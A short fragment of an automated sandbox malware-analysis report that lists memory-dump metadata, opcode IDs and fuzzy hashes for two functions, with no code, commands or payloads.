                                                                                                                                  Function 00007FFAAC5633BD Relevance: .1, Instructions: 123COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2887693381.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac560000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cc8df7d4632373a332144acf84e1fd602e0ecc14271f1550c577b8efcb1dc034
                                                                                                                                  • Instruction ID: 7fc61ef888693f6d9718102fa7bf7e165517ec992fac137376f7e8b1c1a2b937
                                                                                                                                  • Opcode Fuzzy Hash: cc8df7d4632373a332144acf84e1fd602e0ecc14271f1550c577b8efcb1dc034
                                                                                                                                  • Instruction Fuzzy Hash: E0411871E1994ECFEF94DB5CC8456ADB7F1EB69311F108176E00DE3286CA34A8868BD0
                                                                                                                                  Function 00007FFAAC56322F Relevance: .1, Instructions: 112COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2887693381.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac560000_IsStopped.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b7ce564c0d6aef7867602996219fa8a2a20fe426328a2a10cc0e4c9ee1162142
                                                                                                                                  • Instruction ID: b3f60aef510d0ae2400f406dbfe96703ed4e89bd9373b1fd87b02d8579bfb501
                                                                                                                                  • Opcode Fuzzy Hash: b7ce564c0d6aef7867602996219fa8a2a20fe426328a2a10cc0e4c9ee1162142
                                                                                                                                  • Instruction Fuzzy Hash: 1D310871A1994ACFEB94DB5CC8457EDB7B1EF59310F148176E40DE3245CB34A8868B90